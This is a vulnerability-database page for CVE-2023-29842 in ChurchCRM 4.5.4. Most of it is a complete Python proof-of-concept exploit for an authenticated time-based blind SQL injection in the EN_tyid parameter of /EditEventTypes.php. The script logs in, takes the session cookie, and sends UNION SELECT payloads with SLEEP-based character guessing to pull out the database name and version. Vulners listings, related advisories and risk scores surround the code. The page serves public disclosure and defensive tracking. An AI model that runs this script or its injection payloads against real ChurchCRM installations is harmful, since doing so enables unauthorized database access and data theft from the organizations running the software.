Lucene search
K

ChurchCRM 4.5.4 SQL Injection

🗓️ 16 Oct 2023 00:00:00Reported by ArvandyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 350 Views

ChurchCRM 4.5.4 blind SQL injection via EN_tyid parameter. Authenticated attacker can retrieve database name and version

Related
Code
ReporterTitlePublishedViews
Family
0day.today
ChurchCRM 4.5.4 SQL Injection Exploit
16 Oct 202300:00
zdt
CNNVD
ChurchCRM SQL注入漏洞
4 May 202300:00
cnnvd
CNVD
ChurchCRM SQL Injection Vulnerability (CNVD-2023-64496)
11 May 202300:00
cnvd
CVE
CVE-2023-29842
4 May 202300:00
cve
Cvelist
CVE-2023-29842
4 May 202300:00
cvelist
EUVD
EUVD-2023-33379
3 Oct 202520:07
euvd
NVD
CVE-2023-29842
4 May 202303:15
nvd
OSV
CVE-2023-29842
4 May 202303:15
osv
Prion
Sql injection
4 May 202303:15
prion
Positive Technologies
PT-2023-22441 · Churchcrm · Churchcrm
4 May 202300:00
ptsecurity
Rows per page
`# Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid  
# Date: 03-05-2023  
# Exploit Author: Arvandy  
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md  
# Software Link: https://github.com/ChurchCRM/CRM/releases  
# Vendor Homepage: http://churchcrm.io/  
# Version: 4.5.4  
# Tested on: Windows, Linux  
# CVE: CVE-2023-29842  
  
"""  
The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.  
This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name.   
The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping.   
This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.  
  
This script is created as Proof of Concept to retrieve the database name and version.  
"""  
  
  
import sys, requests  
  
def injection(target, inj_str, session_cookies):   
for j in range(32, 126):  
url = "%s/EditEventTypes.php" % (target)  
headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}   
data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j)))  
r = requests.post(url, headers=headers, data=data)  
res = r.text  
if (r.elapsed.total_seconds () > 2 ):  
return j  
return None  
  
  
def retrieveDBName(session_cookies):   
db_name = ""  
print("(+) Retrieving database name, please wait")  
for i in range (1,100):  
injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i  
retrieved_value = injection(target, injection_str, session_cookies)  
if (retrieved_value):  
sys.stdout.write(chr(retrieved_value))  
sys.stdout.flush()   
else:  
break  
  
def retrieveDBVersion(session_cookies):   
db_version = ""  
print("(+) Retrieving database version, please wait")  
for i in range (1,100):  
injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i  
retrieved_value = injection(target, injection_str, session_cookies)  
if (retrieved_value):  
sys.stdout.write(chr(retrieved_value))  
sys.stdout.flush()  
else:  
break   
  
  
def login(target, username, password):  
target = "%s/session/begin" % (target)  
headers = {'Content-Type': 'application/x-www-form-urlencoded'}  
data = "User=%s&Password=%s" % (username, password)  
s = requests.session()  
r = s.post(target, data = data, headers = headers)  
return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')  
  
def main():  
print("(!) Login to the target application")  
session_cookies = login(target, username, password)   
  
print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")  
retrieveDBName(session_cookies)  
  
print("")  
retrieveDBVersion(session_cookies)  
  
if __name__ == "__main__":  
if len(sys.argv) != 4:  
print("(!) Usage: python3 exploit.py <URL> <username> <password>")  
print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")  
sys.exit(-1)  
  
target = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
  
main()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Oct 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.18.8
EPSS0.00124
SSVC
350